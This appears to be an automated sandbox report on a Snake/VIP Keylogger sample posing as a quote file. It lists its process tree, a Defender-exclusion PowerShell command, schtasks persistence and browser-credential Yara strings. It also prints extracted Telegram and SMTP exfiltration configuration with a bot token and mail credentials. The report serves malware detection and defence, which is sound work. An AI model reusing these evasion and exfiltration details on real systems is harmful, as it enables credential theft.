
Windows Analysis Report
Quote_items1&2.bat.exe

Overview

General Information

Sample name: Quote_items1&2.bat.exe
Analysis ID: 1618378
MD5: 2517ead89576385d7e8cc52cedcbf957
SHA1: adc56954bd09a7d831413400fe7bc1bf91322036
SHA256: 200243f2d5b7e6c508171215dd9a2399d59d871cc33a56df55a8b4a38d874bb2
Tags: bat, exe, user-abuse_ch

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Modifies the context of a thread in another process (thread injection)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to detect virtual machines (SGDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Quote_items1&2.bat.exe (PID: 3704 cmdline: "C:\Users\user\Desktop\Quote_items1&2.bat.exe" MD5: 2517EAD89576385D7E8CC52CEDCBF957)
    • powershell.exe (PID: 4236 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6068 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5564 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpC8F3.tmp" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Quote_items1&2.bat.exe (PID: 3884 cmdline: C:\Users\user\Desktop\Quote_items1&2.bat.exe MD5: 2517EAD89576385D7E8CC52CEDCBF957)
  • wJFLKBSbTtvP.exe (PID: 7192 cmdline: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe MD5: 2517EAD89576385D7E8CC52CEDCBF957)
    • schtasks.exe (PID: 7304 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpFBBB.tmp" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wJFLKBSbTtvP.exe (PID: 7352 cmdline: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe MD5: 2517EAD89576385D7E8CC52CEDCBF957)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: (empty)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7354418955:AAH10FAR8IByRBtd_Qs69uwN7lnhl-2X18k/sendMessage"}
{"Exfil Mode": "SMTP", "Bot Token": "7354418955:AAH10FAR8IByRBtd_Qs69uwN7lnhl-2X18k", "Chat id": "6851554211", "Email ID": "hakar@bteenerji.com", "Password": "123husnu", "Host": "mail.bteenerji.com", "Port": "587"}
{"Exfil Mode": "Telegram", "Username": "hakar@bteenerji.com", "Password": "123husnu", "Host": "mail.bteenerji.com", "Port": "587", "Token": "7354418955:AAH10FAR8IByRBtd_Qs69uwN7lnhl-2X18k", "Chat_id": "6851554211", "Version": "4.4"}
Source | Rule | Description | Author | Strings
  • 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
  • 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
  • 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
  • 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
    • 0x2d984:$a1: get_encryptedPassword
    • 0x2dcc1:$a2: get_encryptedUsername
    • 0x2d794:$a3: get_timePasswordChanged
    • 0x2d89d:$a4: get_passwordField
    • 0x2d99a:$a5: set_encryptedPassword
    • 0x2f052:$a7: get_logins
    • 0x2ef9e:$a10: KeyLoggerEventArgs
    • 0x2ec06:$a11: KeyLoggerEventArgsEventHandler
  • 0000000A.00000002.3995487967.00000000031D1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security

Source | Rule | Description | Author | Strings
  • 10.2.Quote_items1&2.bat.exe.140000000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
  • 10.2.Quote_items1&2.bat.exe.140000000.0.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
  • 10.2.Quote_items1&2.bat.exe.140000000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
  • 10.2.Quote_items1&2.bat.exe.140000000.0.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
    • 0x2db84:$a1: get_encryptedPassword
    • 0x2dec1:$a2: get_encryptedUsername
    • 0x2d994:$a3: get_timePasswordChanged
    • 0x2da9d:$a4: get_passwordField
    • 0x2db9a:$a5: set_encryptedPassword
    • 0x2f252:$a7: get_logins
    • 0x2f19e:$a10: KeyLoggerEventArgs
    • 0x2ee06:$a11: KeyLoggerEventArgsEventHandler
  • 10.2.Quote_items1&2.bat.exe.140000000.0.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
    • 0x3b999:$a2: \Comodo\Dragon\User Data\Default\Login Data
    • 0x3b03c:$a3: \Google\Chrome\User Data\Default\Login Data
    • 0x3b299:$a4: \Orbitum\User Data\Default\Login Data
    • 0x3bc78:$a5: \Kometa\User Data\Default\Login Data

                System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quote_items1&2.bat.exe", ParentImage: C:\Users\user\Desktop\Quote_items1&2.bat.exe, ParentProcessId: 3704, ParentProcessName: Quote_items1&2.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe", ProcessId: 4236, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quote_items1&2.bat.exe", ParentImage: C:\Users\user\Desktop\Quote_items1&2.bat.exe, ParentProcessId: 3704, ParentProcessName: Quote_items1&2.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe", ProcessId: 4236, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpFBBB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpFBBB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe, ParentImage: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe, ParentProcessId: 7192, ParentProcessName: wJFLKBSbTtvP.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpFBBB.tmp", ProcessId: 7304, ProcessName: schtasks.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 78.135.65.4, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Quote_items1&2.bat.exe, Initiated: true, ProcessId: 3884, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 64730
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpC8F3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpC8F3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Quote_items1&2.bat.exe", ParentImage: C:\Users\user\Desktop\Quote_items1&2.bat.exe, ParentProcessId: 3704, ParentProcessName: Quote_items1&2.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpC8F3.tmp", ProcessId: 5564, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quote_items1&2.bat.exe", ParentImage: C:\Users\user\Desktop\Quote_items1&2.bat.exe, ParentProcessId: 3704, ParentProcessName: Quote_items1&2.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe", ProcessId: 4236, ProcessName: powershell.exe

                Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpC8F3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpC8F3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Quote_items1&2.bat.exe", ParentImage: C:\Users\user\Desktop\Quote_items1&2.bat.exe, ParentProcessId: 3704, ParentProcessName: Quote_items1&2.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpC8F3.tmp", ProcessId: 5564, ProcessName: schtasks.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-18T20:25:34.845744+0100 | 2060048 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 64775 | 78.135.65.4 | 587 | TCP
2025-02-18T20:25:34.845744+0100 | 2060048 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 64730 | 78.135.65.4 | 587 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-18T20:26:05.587638+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49834 | 104.21.16.1 | 443 | TCP
2025-02-18T20:26:07.041054+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49843 | 104.21.16.1 | 443 | TCP
2025-02-18T20:26:08.464493+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49853 | 104.21.16.1 | 443 | TCP
2025-02-18T20:26:09.754048+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49863 | 104.21.16.1 | 443 | TCP
2025-02-18T20:26:11.684842+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49874 | 104.21.16.1 | 443 | TCP
2025-02-18T20:26:14.721583+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49896 | 104.21.16.1 | 443 | TCP
2025-02-18T20:26:15.605415+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49902 | 104.21.16.1 | 443 | TCP
2025-02-18T20:26:16.854172+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49911 | 104.21.16.1 | 443 | TCP
2025-02-18T20:26:18.504092+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49925 | 104.21.16.1 | 443 | TCP
2025-02-18T20:26:20.593886+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49939 | 104.21.16.1 | 443 | TCP
2025-02-18T20:26:21.336279+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49944 | 104.21.16.1 | 443 | TCP
2025-02-18T20:26:22.211477+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49951 | 104.21.16.1 | 443 | TCP
2025-02-18T20:26:24.187457+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 64729 | 104.21.16.1 | 443 | TCP
2025-02-18T20:26:25.008291+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 64736 | 104.21.16.1 | 443 | TCP
2025-02-18T20:26:25.996979+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 64742 | 104.21.16.1 | 443 | TCP
2025-02-18T20:26:27.867209+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 64752 | 104.21.16.1 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-18T20:26:02.486137+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49791 | 193.122.130.0 | 80 | TCP
2025-02-18T20:26:05.033036+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49791 | 193.122.130.0 | 80 | TCP
2025-02-18T20:26:06.486148+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49791 | 193.122.130.0 | 80 | TCP
2025-02-18T20:26:07.829999+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49791 | 193.122.130.0 | 80 | TCP
2025-02-18T20:26:09.173654+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49791 | 193.122.130.0 | 80 | TCP
2025-02-18T20:26:11.095539+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49791 | 193.122.130.0 | 80 | TCP
2025-02-18T20:26:14.158051+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49791 | 193.122.130.0 | 80 | TCP
2025-02-18T20:26:15.033030+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49791 | 193.122.130.0 | 80 | TCP
2025-02-18T20:26:15.767461+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49880 | 193.122.130.0 | 80 | TCP
2025-02-18T20:26:16.283036+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49791 | 193.122.130.0 | 80 | TCP
2025-02-18T20:26:17.908019+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49880 | 193.122.130.0 | 80 | TCP
2025-02-18T20:26:20.033015+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49880 | 193.122.130.0 | 80 | TCP
2025-02-18T20:26:20.751929+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49880 | 193.122.130.0 | 80 | TCP
2025-02-18T20:26:21.486160+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49880 | 193.122.130.0 | 80 | TCP
2025-02-18T20:26:23.392453+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49880 | 193.122.130.0 | 80 | TCP
2025-02-18T20:26:24.408174+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49880 | 193.122.130.0 | 80 | TCP
2025-02-18T20:26:25.345549+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49880 | 193.122.130.0 | 80 | TCP
2025-02-18T20:26:27.220559+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49880 | 193.122.130.0 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-18T20:26:27.032091+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.6 | 64747 | 149.154.167.220 | 443 | TCP
2025-02-18T20:26:39.125845+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.6 | 64776 | 149.154.167.220 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-18T20:26:17.765581+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.6 | 49917 | 149.154.167.220 | 443 | TCP
2025-02-18T20:26:28.829399+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.6 | 64757 | 149.154.167.220 | 443 | TCP


                AV Detection

Source: http://mail.bteenerji.com | Avira URL Cloud: Label: malware
Source: http://bteenerji.com | Avira URL Cloud: Label: malware
Source: 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Bot Token": "7354418955:AAH10FAR8IByRBtd_Qs69uwN7lnhl-2X18k", "Chat id": "6851554211", "Email ID": "hakar@bteenerji.com", "Password": "123husnu", "Host": "mail.bteenerji.com", "Port": "587"}
Source: 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Username": "hakar@bteenerji.com", "Password": "123husnu", "Host": "mail.bteenerji.com", "Port": "587", "Token": "7354418955:AAH10FAR8IByRBtd_Qs69uwN7lnhl-2X18k", "Chat_id": "6851554211", "Version": "4.4"}
Source: Quote_items1&2.bat.exe.3884.10.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7354418955:AAH10FAR8IByRBtd_Qs69uwN7lnhl-2X18k/sendMessage"}
Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | ReversingLabs: Detection: 45%
Source: Quote_items1&2.bat.exe | Virustotal: Detection: 45%
Source: Quote_items1&2.bat.exe | ReversingLabs: Detection: 45%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack | String decryptor: hakar@bteenerji.com
Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack | String decryptor: 123husnu
Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack | String decryptor: mail.bteenerji.com
Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack | String decryptor: albertchigemezu@yandex.com
Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack | String decryptor: 587
Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack | String decryptor: 7354418955:AAH10FAR8IByRBtd_Qs69uwN7lnhl-2X18k
Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack | String decryptor: 6851554211
Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack | String decryptor:

                Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49815 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49909 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49917 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:64757 version: TLS 1.2
Source: Quote_items1&2.bat.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Windows.Forms.pdb source: Quote_items1&2.bat.exe, 00000000.00000002.2323496123.000000000125F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.pdbt source: Quote_items1&2.bat.exe, 00000000.00000002.2323496123.000000000125F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: uyCa.pdb% source: Quote_items1&2.bat.exe, 00000000.00000002.2333448655.000000001C83A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: uyCa.pdbSHA256: source: Quote_items1&2.bat.exe, wJFLKBSbTtvP.exe.0.dr
                Source: Binary string: .Forms.pdb source: Quote_items1&2.bat.exe, 00000000.00000002.2333448655.000000001C83A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: uyCa.pdb source: Quote_items1&2.bat.exe, wJFLKBSbTtvP.exe.0.dr
Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Code function: 4x nop then dec eax | 0_2_00007FFD344E0E26
Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Code function: 4x nop then jmp 00007FFD3450C120h | 10_2_00007FFD3450BD3D
Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Code function: 4x nop then jmp 00007FFD345098D4h | 10_2_00007FFD345096C2
Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Code function: 4x nop then jmp 00007FFD3450BB2Dh | 10_2_00007FFD3450B79D
Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Code function: 4x nop then jmp 00007FFD34509519h | 10_2_00007FFD34508A65
Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Code function: 4x nop then jmp 00007FFD3450C120h | 10_2_00007FFD3450C03C
Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Code function: 4x nop then jmp 00007FFD34508432h | 10_2_00007FFD34508271
Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Code function: 4x nop then jmp 00007FFD3450A380h | 10_2_00007FFD34509B09
Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Code function: 4x nop then dec eax | 12_2_00007FFD34500E26
Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Code function: 4x nop then jmp 00007FFD3451C120h | 15_2_00007FFD3451BD3D
Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Code function: 4x nop then jmp 00007FFD345198D4h | 15_2_00007FFD345196C2
Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Code function: 4x nop then jmp 00007FFD3451BB2Dh | 15_2_00007FFD3451B79D
Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Code function: 4x nop then jmp 00007FFD34519519h | 15_2_00007FFD34518A65
Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Code function: 4x nop then jmp 00007FFD3451C120h | 15_2_00007FFD3451C03C
Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Code function: 4x nop then jmp 00007FFD34518432h | 15_2_00007FFD34518271
Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Code function: 4x nop then jmp 00007FFD3451A380h | 15_2_00007FFD34519B09

                Networking

Source: Network traffic | Suricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.6:64775 -> 78.135.65.4:587
Source: Network traffic | Suricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.6:64730 -> 78.135.65.4:587
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:64776 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:64757 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49917 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:64747 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | TCP traffic: 192.168.2.6:64730 -> 78.135.65.4:587
Source: global traffic | TCP traffic: 192.168.2.6:64719 -> 162.159.36.2:53
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
